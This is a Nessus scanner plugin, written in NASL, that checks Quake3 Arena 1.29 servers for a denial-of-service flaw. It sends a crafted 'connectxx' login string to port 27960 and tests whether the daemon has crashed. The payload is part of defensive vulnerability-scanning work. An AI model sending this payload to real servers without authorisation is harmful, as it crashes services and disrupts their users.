home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / quake3_dos.nasl < prev    next >
Text File  |  2005-03-31  |  2KB  |  92 lines
  1. #
  2. # This script was written by Michel Arboi <arboi@alussinan.org>, starting 
  3. # from miscflood.nasl
  4. #
  5. # Script audit and contributions from Carmichael Security <http://www.carmichaelsecurity.com>
  6. #      Erik Anderson <eanders@carmichaelsecurity.com>
  7. #      Added BugtraqID and CVE
  8. #
  9. # See the Nessus Scripts License for details
  10. #
  11.  
  12. if(description)
  13. {
  14.  script_id(10931);
  15.  script_bugtraq_id(3123);
  16.  script_version("$Revision: 1.7 $");
  17.  script_cve_id("CAN-2001-1289");
  18.  name["english"] = "Quake3 Arena 1.29 f/g DOS";
  19.  name["francais"] = "DΘni de service contre Quake3 Arena 1.29 f/g";
  20.  script_name(english:name["english"], francais:name["francais"]);
  21.  
  22.  desc["english"] = "It was possible to crash
  23. the Quake3 Arena daemon by sending a specially
  24. crafted login string.
  25.  
  26. A cracker may use this attack to make this
  27. service crash continuously, preventing you
  28. from playing.
  29.  
  30. Solution: upgrade your software
  31.  
  32. Risk factor : Low";
  33.  
  34.  
  35.  desc["francais"] = "Il a ΘtΘ possible de
  36. faire planter le dΘmon Quake3 Arena en lui
  37. envoyant une sΘquence de connexion spΘciale.
  38.  
  39. Un pirate peut exploiter cette faille 
  40. pour faire planter continuellement ce
  41. service, vous empΩchant ainsi de jouer.
  42.  
  43. Solution: mettez α jour votre logiciel
  44.  
  45. Facteur de risque : Bas";
  46.  
  47.  script_description(english:desc["english"], francais:desc["francais"]);
  48.  
  49.  summary["english"] = "Quake3 Arena DOS";
  50.  summary["francais"] = "DΘni de service contre Quake3 Arena";
  51.  script_summary(english:summary["english"], francais:summary["francais"]);
  52.  
  53.  script_category(ACT_DESTRUCTIVE_ATTACK);
  54.  
  55.  script_copyright(english:"This script is Copyright (C) 2001 Michel Arboi",
  56.         francais:"Ce script est Copyright (C) 2001 Michel Arboi");
  57.  family["english"] = "Denial of Service";
  58.  family["francais"] = "DΘni de service";
  59.  
  60.  script_family(english:family["english"], francais:family["francais"]);
  61.  script_require_ports(27960);
  62.  exit(0);
  63. }
  64.  
  65. #
  66.  
  67. function test_q3_port(port)
  68. {
  69.  if (! get_port_state(port))
  70.   return(0);
  71.  
  72.  soc = open_sock_tcp(port);
  73.  if (!soc)
  74.   return(0);
  75.  s = string(raw_string(0xFF, 0xFF, 0xFF, 0xFF), "connectxx");
  76.  send(socket:soc, data:s);
  77.  close(soc);
  78.  
  79.  soc = open_sock_tcp(port);
  80.  if (! soc)
  81.  {
  82.   security_hole(port);
  83.  }
  84.  
  85.  if (soc)
  86.   close(soc);
  87.  return(1);
  88. }
  89.  
  90. test_q3_port(port:27960);
  91.  
  92.